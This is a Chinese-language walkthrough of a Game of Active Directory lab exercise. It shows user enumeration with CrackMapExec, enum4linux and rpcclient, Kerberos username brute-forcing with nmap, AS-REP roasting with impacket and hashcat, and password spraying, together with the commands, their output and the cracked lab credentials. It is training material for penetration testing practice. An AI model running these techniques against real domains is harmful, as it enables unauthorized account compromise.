game of active directory(GOAD) part 2 查找用户

admin 2024年11月21日13:35:38评论2 views字数 4839阅读16分7秒阅读模式

part 1常规配置及端口信息收集后,接下来可以进行用户信息收集,尝试收集一些凭证信息。

凉城,公众号:ListSecgame of active directory(GOAD) part 1 侦查和扫描
game of active directory(GOAD)  part 2 查找用户

vagrant up启动休眠的机器

CME枚举

DC02:192.168.56.11

cme smb 192.168.56.11--users
game of active directory(GOAD)  part 2 查找用户

Samwell Tarly用户有提示,Password : Heartsbane

获取域密码策略

crackmapexec smb 192.168.56.11--pass-pol
game of active directory(GOAD)  part 2 查找用户

查看密码策略,5分钟内登录失败5次,则锁定五分钟

enum4linux枚举

enum4linux 192.168.56.11

enum4linux也可以cme一样,枚举出用户信息

game of active directory(GOAD)  part 2 查找用户

密码策略

game of active directory(GOAD)  part 2 查找用户

还可以枚举出域组成员

game of active directory(GOAD)  part 2 查找用户

rpc调用

game of active directory(GOAD)  part 2 查找用户

匿名列表是通过在winterfell这台设备上(IP地址为192.168.56.11)执行远程过程调用来实现的,同样,我们也可以通过rpcclient工具直接进行这一操作。

$ rpcclient -"NORTH\"192.168.56.11-N
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]
rpcclient $> enumdomgroups
group:[DomainUsers] rid:[0x201]
group:[DomainGuests] rid:[0x202]
group:[DomainComputers] rid:[0x203]
group:[GroupPolicyCreatorOwners] rid:[0x208]
group:[CloneableDomainControllers] rid:[0x20a]
group:[ProtectedUsers] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[NightWatch] rid:[0x453]
group:[Mormont] rid:[0x454]
rpcclient $>

获取所有域用户

# 列出NORTH域中Domain Users组的成员,使用 IP 地址192.168.56.11连接,并使用匿名用户身份。
net rpc group members 'Domain Users'-'NORTH'-'192.168.56.11'-'%'
game of active directory(GOAD)  part 2 查找用户

当不允许匿名会话时,列举DC的匿名会话

Winterfell域控制器允许匿名连接,这正是我们能够列出域用户和组的原因。然而,如今这种配置几乎不再出现。(相反,在用户描述中包含密码的情况相当常见。)

我们仍然可以通过暴力枚举来列举有效用户。

1、创建个字典

从HBO中下载的

# 目前这条命令已无法下载
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -'aria-label="[^"]*"'|cut-'"'-2| awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }'> got_users.txt

得到如下字典

robert.baratheon
tyrion.lannister
cersei.lannister
catelyn.stark
jaime.lannister
daenerys.targaryen
viserys.targaryen
jon.snow
robb.stark
sansa.stark
arya.stark
bran.stark
rickon.stark
joffrey.baratheon
jorah.mormont
theon.greyjoy
samwell.tarly
renly.baratheon
ros
jeor.mormont
gendry
lysa.arryn
robin.arryn
bronn
grand.maester
varys
loras.tyrell
shae
benjen.stark
barristan.selmy
khal.drogo
hodor
lancel.lannister
maester.luwin
alliser.thorne
osha
maester.aemon
talisa.stark
brienne.of
davos.seaworth
tywin.lannister
stannis.baratheon
margaery.tyrell
ygritte
balon.greyjoy
roose.bolton
gilly
podrick.payne
melisandre
yara.greyjoy
jaqen.hghar
grey.worm
beric.dondarrion
missandei
mance.rayder
tormund
ramsay.snow
olenna.tyrell
thoros.of
orell
qyburn
brynden.tully
tommen.baratheon
daario.naharis
oberyn.martell
myrcella.baratheon
obara.sand
nym.sand
tyene.sand
high.sparrow
trystane.martell
doran.martell
euron.greyjoy
lady.crane
high.priestess
randyll.tarly
izembaro
brother.ray
archmaester.ebrose

让我们尝试在 meereen.essos.local 域控制器和 kingslanding.sevenkingdoms.local 上使用这个用户字典。

nmap -88--script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt"192.168.56.10
game of active directory(GOAD)  part 2 查找用户

在sevenkingdoms.local 上得到了7个可用的用户

nmap -88--script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt"192.168.56.12
game of active directory(GOAD)  part 2 查找用户

essos.local发现了5个可用的用户

khal.drogo@essos.local
jorah.mormont@essos.local
missandei@essos.local
viserys.targaryen@essos.local
daenerys.targaryen@essos.local

nmap的页面上可以看到:

通过尝试各种可能的用户名来识别有效的用户名,并对Kerberos服务进行查询。如果请求的用户名不存在,服务器会返回Kerberos错误代码KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN,这样我们就可以知道该用户名是无效的。如果用户名有效,服务器会通过AS-REP响应发送TGT,或者返回错误KRB5KDC_ERR_PREAUTH_REQUIRED,这表示用户需要进行预认证。

总的来说,暴力破解用户密码时,badpwdcount 的数值并不会上升(用crackmapexec看不到badpwdcount 的数值)。

game of active directory(GOAD)  part 2 查找用户

smb共享

看看smb共享

game of active directory(GOAD)  part 2 查找用户

找匿名共享

cme smb 192.168.56.10-23-'a'-''--shares
game of active directory(GOAD)  part 2 查找用户

发现了一些可以进行读取和写入操作的匿名共享资源。

现在有用户,但是没有凭证

我们现在已经拥有了用户列表,下一步是尝试获取他们的密码。

game of active directory(GOAD)  part 2 查找用户

ASREP - roasting

根据之前查找的用户名创建了一个 users.txt 文件,其中包含了之前在north.sevenkingdoms.local上发现的所有用户名。

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

现在可以尝试利用impacket工具对所有用户执行AS-REP攻击。

GetNPUsers.py north.sevenkingdoms.local/-no-pass-usersfile users.txt
game of active directory(GOAD)  part 2 查找用户

我们为brandon.stark账户取得了访问权限,尝试破解它,因为用户并没有启用Kerberos预认证机制。

hashcat -18200 hashs.txt rockyou.txt
game of active directory(GOAD)  part 2 查找用户

现在得到两个账号密码

brandon.stark:iseedeadpeople
SamwellTarly:Heartsbane

Password Spray

我们可以进行传统的用户名和密码验证测试。

crackmapexec smb 192.168.56.11-u user.txt -p user.txt --no-bruteforce
game of active directory(GOAD)  part 2 查找用户

可以使用sprayhound

安装sprayhound

sudo apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev
git clone https://github.com/Hackndo/sprayhound.git
cd sprayhound
python3 setup.py install
sprayhound -U user.txt -d north.sevenkingdoms.local-dc 192.168.56.11--lower
game of active directory(GOAD)  part 2 查找用户

我们可以使用一个有效的用户身份来尝试规避账户锁定的问题(通过 -t 选项来设定剩余的尝试机会)。

sprayhound -U user.txt -d north.sevenkingdoms.local-dc 192.168.56.11-lu hodor -lp hodor --lower -2

现在获得了三组凭证,分别为:

  • • brandon.stark:iseedeadpeople(通过用户描述获的)

  • • Samwell Tarly:Heartsbane(通过asreproasting获的)

  • • hodor:hodor(通过密码喷射获的)

这一章结束,使用vagrant suspend暂停虚拟机,需要在虚拟环境的/GOAD/ad/GOAD/providers/virtualbox下运行vagrant

game of active directory(GOAD)  part 2 查找用户
game of active directory(GOAD)  part 2 查找用户

参考: https://mayfly277.github.io/posts/GOADv2-pwning-part2/

原文始发于微信公众号(ListSec):game of active directory(GOAD) part 2 查找用户

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日13:35:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   game of active directory(GOAD) part 2 查找用户https://cn-sec.com/archives/3399861.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息